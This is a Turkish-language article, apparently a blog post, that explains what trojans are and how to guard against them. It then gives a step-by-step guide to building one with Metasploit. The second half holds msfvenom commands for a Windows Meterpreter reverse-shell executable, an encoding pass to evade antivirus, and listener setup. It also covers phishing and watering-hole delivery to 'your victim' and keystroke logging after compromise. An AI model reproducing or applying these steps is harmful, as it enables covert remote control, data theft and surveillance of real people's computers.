Trojan Nedir? Kali Linux'ta Trojan Nasıl Oluşturulur?

Fotoğraf: KEMAL HAYIT
 Tanım:

Trojan, bilgisayar güvenliğinde zararlı bir yazılım türüdür. Adını, Yunan mitolojisindeki Truva Atı'ndan alır. Tıpkı Truva Atı'nın dışarıdan zararsız bir hediye olarak görünüp içinde askerleri barındırması gibi, Trojan da kullanıcıya masum veya yararlı bir yazılım gibi görünürken aslında zararlı işlevlere sahiptir.


Çalışma Prensibi:

Trojan'lar, bilgisayara sızdıktan sonra genellikle arka planda çalışır ve kullanıcının bilgisi dışında çeşitli zararlı işlemler gerçekleştirir. Bu işlemler, sistemdeki verilere erişmek, kişisel bilgileri çalmak, sistem kaynaklarını kullanmak veya diğer zararlı yazılımları indirmek ve çalıştırmak olabilir.


Trojan Türleri:


Backdoor Trojan: Bu tür, saldırganın kurbanın bilgisayarına uzaktan erişim sağlamasına olanak tanır. Böylece saldırgan, bilgisayarı kontrol edebilir, dosyaları değiştirebilir veya yeni yazılımlar yükleyebilir.

Downloader Trojan: Bu tür, bilgisayara sızdıktan sonra diğer zararlı yazılımları indirir ve kurar.

Infostealer Trojan: Kişisel bilgileri, şifreleri veya finansal bilgileri çalmak için tasarlanmıştır.

Ransom Trojan (Fidye Yazılımı): Kullanıcının dosyalarını şifreler ve bu dosyaları geri alabilmek için fidye talep eder.

DDoS Trojan: Kurbanın bilgisayarını, hedeflenen web sitelerine yönlendirilmiş bir DDoS (Dağıtık Hizmet Engelleme) saldırısının parçası haline getirir.

Bankacılık Trojan'ı: Bankacılık işlemleri sırasında kullanıcının bilgilerini çalar.

Nasıl Yayılır?

Trojan'lar genellikle aşağıdaki yöntemlerle yayılır:


E-posta Ekleri: Zararlı bir yazılım, masum bir e-posta eki gibi gönderilebilir.

Sahte Yazılım Güncellemeleri: Kullanıcıyı, gerçekte zararlı olan sahte bir yazılım güncellemesi indirmeye ikna edebilir.

Zararlı Web Siteleri: Kullanıcının bilgisayarına otomatik olarak zararlı yazılım indirebilecek web siteleri.

Sosyal Mühendislik: Kullanıcıyı, zararlı bir dosyayı indirmeye veya çalıştırmaya ikna eden taktikler.

Korunma Yolları:


Güncel Antivirüs Yazılımı: Bilgisayarınızda güncel bir antivirüs yazılımı bulundurmak, Trojan'ların sızmasını önleyebilir.

Düzenli Yazılım Güncellemeleri: İşletim sistemi ve diğer yazılımların düzenli olarak güncellenmesi, bilinen güvenlik açıklarını kapatır.

E-posta Eklerine Dikkat: Tanımadığınız kişilerden gelen e-posta eklerini açmamanız önerilir.

Güvenli Tarama Alışkanlıkları: Sadece güvendiğiniz web sitelerini ziyaret edin ve bilinmeyen kaynaklardan yazılım indirmekten kaçının.




Kali Linux Kullanarak Trojan Oluşturmak:


1. Kali Linux Hazırlığı:


Kali Linux'u güncelleyin: sudo apt-get update && sudo apt-get upgrade

Gerekli araçların kurulu olduğundan emin olun: sudo apt-get install metasploit-framework

2. Metasploit Framework ve Temel Bilgiler:


Metasploit, siber güvenlik uzmanları için geliştirilmiş bir penetrasyon testi aracıdır.

Metasploit'in ana arayüzüne erişmek için terminalde msfconsole komutunu girin.

3. Payload Seçimi ve Oluşturma:


Metasploit, farklı işletim sistemleri ve durumlar için birçok payload sunar.

Örnek olarak, Windows için windows/meterpreter/reverse_tcp payload'ını kullanabilirsiniz.

Payload'u oluşturmak için: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP adresiniz] LPORT=4444 -f exe > trojan.exe

4. Farklı Payload Seçenekleri ve Teknikleri:


Bind TCP: Bu yöntem, kurbanın bilgisayarında belirli bir portu dinlemesini sağlar. Bu, kurbanın arkasında bir firewall olmadığında kullanışlıdır.

Reverse TCP: Kurbanın bilgisayarının sizin belirttiğiniz IP adresine bağlanmasını sağlar. Bu, NAT arkasında bir hedefe saldırırken kullanışlıdır.

HTTPS: Şifrelenmiş bir bağlantı üzerinden veri transferi yapar. Bu, ağ trafiğinin izlenmesi durumunda verilerin gizliliğini korumaya yardımcı olur.

5. Trojan'ın Şifrelenmesi ve Gizlenmesi:


Oluşturduğunuz Trojan, antivirüs programları tarafından tespit edilebilir. Bu nedenle, şifrelemek ve gizlemek önemlidir.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP adresiniz] LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encrypted_trojan.exe

Bu komut, Trojan'ı 5 kez şifreler ve antivirüs programlarının tespitini zorlaştırır.

6. Sosyal Mühendislik ve Dağıtım:


Oluşturduğunuz Trojan'ı kurbanınıza ulaştırmak için sosyal mühendislik teknikleri kullanabilirsiniz.

Phishing: Kurbanınıza özel olarak hazırlanmış bir e-posta göndererek onu zararlı bir bağlantıya tıklamaya veya dosyayı indirmeye ikna edebilirsiniz.

Watering Hole: Kurbanınızın sıkça ziyaret ettiği bir web sitesini hedef alarak oraya zararlı kod ekleyebilirsiniz.

7. Saldırının İzlenmesi ve Kontrol:


Kurban, Trojan'ı çalıştırdığında, sizin belirttiğiniz IP adresine bağlanacaktır.

msfconsole içerisinde use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST [IP adresiniz], set LPORT 4444 ve exploit komutlarını sırasıyla kullanarak bağlantıyı dinleyebilir ve kurbanın bilgisayarını kontrol edebilirsiniz.

8. Post-Exploitation:


Kurbanın bilgisayarına erişim sağladıktan sonra, sistemdeki bilgilere erişebilir, ek yazılımlar yükleyebilir veya sistemde değişiklikler yapabilirsiniz.

Örnek olarak, keyscan_start komutu ile kurbanın klavye tuş vuruşlarını izleyebilirsiniz.